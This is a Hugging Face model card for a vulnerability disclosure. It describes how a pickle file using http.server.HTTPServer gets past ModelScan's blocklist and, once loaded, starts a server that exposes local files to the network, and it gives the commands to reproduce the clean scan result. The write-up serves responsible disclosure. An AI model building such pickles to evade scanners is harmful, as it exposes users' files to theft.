Hugging Face's logo

manja316
/
modelscan-bypass-httpserver

PyTorch
security-research
modelscan-bypass
Model card Files
xet
 Community
modelscan-bypass-httpserver / README.md
manja316's picture
manja316
Upload folder using huggingface_hub
aa4e7bd verified
preview code
|
raw
history blame contribute delete
759 Bytes
metadata 
library_name: pytorch
tags:
  - security-research
  - modelscan-bypass
license: mit

ModelScan Bypass PoC — http.server.HTTPServer

Security research for responsible disclosure via Huntr MFV program.

Vulnerability

http.server.HTTPServer is not in modelscan's unsafe_globals blocklist. modelscan reports "No issues found" but loading triggers starts an HTTP server on deserialization — serves ALL local files to the network.

Impact: CRITICAL

http is not in the blocklist (only httplib is). HTTPServer constructor binds to a port and socket is used internally but the constructor is via http.server, not socket directly.

Reproduction 

pip install modelscan
modelscan scan -p bypass_poc.pkl
# Output: "No issues found!"